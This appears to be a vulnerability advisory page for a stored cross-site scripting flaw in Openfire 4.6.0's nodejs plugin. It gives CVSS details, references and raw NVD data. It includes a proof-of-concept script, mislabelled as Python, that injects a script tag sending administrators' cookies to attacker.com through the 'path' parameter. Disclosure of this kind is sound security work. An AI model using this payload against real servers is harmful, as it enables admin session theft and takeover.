CVE-2020-36956

Description

Openfire 4.6.0 contains a stored cross-site scripting vulnerability in the nodejs plugin that allows attackers to inject malicious scripts through the 'path' parameter. Attackers can craft a payload with script tags to execute arbitrary JavaScript in the context of administrative users viewing the nodejs configuration page.

CVSS Details

CVSS Score

6.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Openfire 4.6.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2020-36956 PoC - Stored XSS in Openfire nodejs plugin path parameter
// Target: Openfire 4.6.0 with nodejs plugin
// This PoC demonstrates injecting JavaScript via the 'path' parameter

// Step 1: Authenticate with low-privilege account
const authToken = 'Basic ' + btoa('lowpriv_user:password');

// Step 2: Inject malicious script through path parameter
const payload = '<script>document.location="https://attacker.com/steal?c="+document.cookie</script>';
const xssPayload = encodeURIComponent(payload);

// Step 3: Send crafted request to nodejs plugin configuration endpoint
fetch('http://target:9090/plugins/nodejs/settings', {
    method: 'POST',
    headers: {
        'Authorization': authToken,
        'Content-Type': 'application/x-www-form-urlencoded'
    },
    body: `path=${xssPayload}&save=Save`
});

// When admin visits the nodejs config page, the script executes:
// - Cookie is stolen and sent to attacker-controlled server
// - Attacker can hijack admin session
// - Attacker gains full admin access to Openfire management console

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2020-36956
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2020-36956
[3] CVE Details https://www.cvedetails.com/cve/CVE-2020-36956/
[4] VulDB https://vuldb.com/cve/CVE-2020-36956
[5] https://github.com/igniterealtime/Openfire
[6] https://www.exploit-db.com/exploits/49229
[7] https://www.igniterealtime.org/downloads/
[8] https://www.vulncheck.com/advisories/openfire-path-stored-xss

Raw JSON Data

JSON

{"cve": {"id": "CVE-2020-36956", "sourceIdentifier": "[email protected]", "published": "2026-01-26T18:16:26.313", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Openfire 4.6.0 contains a stored cross-site scripting vulnerability in the nodejs plugin that allows attackers to inject malicious scripts through the 'path' parameter. Attackers can craft a payload with script tags to execute arbitrary JavaScript in the context of administrative users viewing the nodejs configuration page."}, {"lang": "es", "value": "Openfire 4.6.0 contiene una vulnerabilidad de cross-site scripting almacenado en el plugin de nodejs que permite a los atacantes inyectar scripts maliciosos a través del parámetro 'path'. Los atacantes pueden crear una carga útil con etiquetas de script para ejecutar JavaScript arbitrario en el contexto de usuarios administrativos que visualizan la página de configuración de nodejs."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/igniterealtime/Openfire", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49229", "source": "[email protected]"}, {"url": "https://www.igniterealtime.org/downloads/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/openfire-path-stored-xss", "source": "[email protected]"}]}}